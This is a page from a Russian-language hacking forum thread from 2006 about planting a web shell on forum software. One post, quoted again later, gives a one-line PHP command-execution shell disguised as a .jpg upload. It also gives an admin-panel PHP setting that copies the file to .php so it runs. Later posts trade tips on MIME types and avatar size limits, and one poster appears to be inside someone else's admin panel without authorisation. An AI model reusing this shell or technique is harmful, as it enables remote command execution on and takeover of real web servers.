ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 28.07.2006, 17:33
GreenBear
наркоман с медалью
Регистрация: 07.05.2005
Сообщений: 3,704
Провел на форуме:
19975136

Репутация: 4536


Отправить сообщение для GreenBear с помощью ICQ
По умолчанию

Все зависит от настроек апача.
Видать не прописан phtml там =)
 
Ответить с цитированием

  #12  
Старый 09.08.2006, 21:59
orex
Новичок
Регистрация: 08.08.2006
Сообщений: 5
Провел на форуме:
17201

Репутация: 1
По умолчанию

Ребят , пытаюсь через смайлы залить пишет:мона типа тока изображ gif ,jpg и тд ,
пытался через phtml тоже отшило (: как еще залить можно ?
 
Ответить с цитированием

  #13  
Старый 11.08.2006, 13:58
VampiRUS
Участник форума
Регистрация: 31.12.2005
Сообщений: 231
Провел на форуме:
1106266

Репутация: 366
Отправить сообщение для VampiRUS с помощью Yahoo
По умолчанию

предлагаю ещё способ: заливаем файл .jpg например с таким содержанием
PHP код:
<? system($_GET['cmd'])?>
идём в админку, настройки, выбираем любую, жмём добавить новую настройку, и в поле "Выполнение PHP-кода до отображения или сохранения настройки": пишем copy('/home/www/forum/uploads/av.jpg','/home/www/forum/uploads/av.php').
 
Ответить с цитированием

  #14  
Старый 11.08.2006, 14:59
Azazel
Заведующий всем
Регистрация: 17.04.2005
Сообщений: 1,062
Провел на форуме:
5957900

Репутация: 561


По умолчанию

Папки на сервере должны быть на запись открыты. Этим руководит админ. 2 orex, читай внимательно.
__________________
Full DNS report
 
Ответить с цитированием

  #15  
Старый 12.08.2006, 15:44
orex
Новичок
Регистрация: 08.08.2006
Сообщений: 5
Провел на форуме:
17201

Репутация: 1
По умолчанию

нашел тута еще тему про подмену хттп запроса (: ща попробую разобратся
 
Ответить с цитированием

  #16  
Старый 15.08.2006, 13:30
*Van*
Постоянный
Регистрация: 14.08.2005
Сообщений: 378
Провел на форуме:
670862

Репутация: 54
Отправить сообщение для *Van* с помощью ICQ
По умолчанию

Цитата:
Сообщение от VampiRUS  
предлагаю ещё способ: заливаем файл .jpg например с таким содержанием
PHP код:
<? system($_GET['cmd'])?>
идём в админку, настройки, выбираем любую, жмём добавить новую настройку, и в поле "Выполнение PHP-кода до отображения или сохранения настройки": пишем copy('/home/www/forum/uploads/av.jpg','/home/www/forum/uploads/av.php').
Для этого необходимо ещё знать путь к директории с форумом.

Такой вопрос: будет ли рабоать шелл, если его залить как *.gif, а в админке прописать mime-тип для расширения gif как application/octet-stream ?
 
Ответить с цитированием

  #17  
Старый 15.08.2006, 14:49
Inferno
Участник форума
Регистрация: 30.12.2005
Сообщений: 155
Провел на форуме:
2714612

Репутация: 31
По умолчанию

Цитата:
Сообщение от *Van*  
Такой вопрос: будет ли рабоать шелл, если его залить как *.gif, а в админке прописать mime-тип для расширения gif как application/octet-stream ?
Незнаю у меня таким методом файл не цыпляется в ачачи и аватары!
 
Ответить с цитированием

  #18  
Старый 15.08.2006, 18:45
SanyaX
.::Club Life::.
Регистрация: 28.01.2005
Сообщений: 1,205
Провел на форуме:
7426415

Репутация: 1398


Отправить сообщение для SanyaX с помощью ICQ
По умолчанию

Только что проверил. Всё пашет. Михе респект.
__________________
-=Ok let's Go=-
-=OpenVPN=-
 
Ответить с цитированием

  #19  
Старый 15.08.2006, 18:51
Inferno
Участник форума
Регистрация: 30.12.2005
Сообщений: 155
Провел на форуме:
2714612

Репутация: 31
По умолчанию

Цитата:
Сообщение от SanyaX  
Только что проверил. Всё пашет. Михе респект.
А на каком форуме пробывал,может ещё зависит от настройки апачя?
 
Ответить с цитированием

  #20  
Старый 22.09.2006, 19:49
~Real F@ck!~
Постоянный
Регистрация: 09.07.2006
Сообщений: 443
Провел на форуме:
2382453

Репутация: 354
Отправить сообщение для ~Real F@ck!~ с помощью ICQ
По умолчанию

Мужики что делать? Пишет мол фаил с аватором слишком большой? А админка на английском, немогу понять что к чему, помогить плиз пока меня там нафиг неудалили из админки!
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Заливка шелла T-4 PHP, PERL, MySQL, JavaScript 8 01.01.2006 19:05
Заливка шелла на PHP-Fusion. ilyha Форумы 11 09.12.2005 20:52
Заливка шелла черех смайлы в ipb ..::k0rps::.. Форумы 1 28.11.2005 14:48
Заливка шелла и снятие бана в ipb через mysql darks Форумы 14 26.11.2005 00:03



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ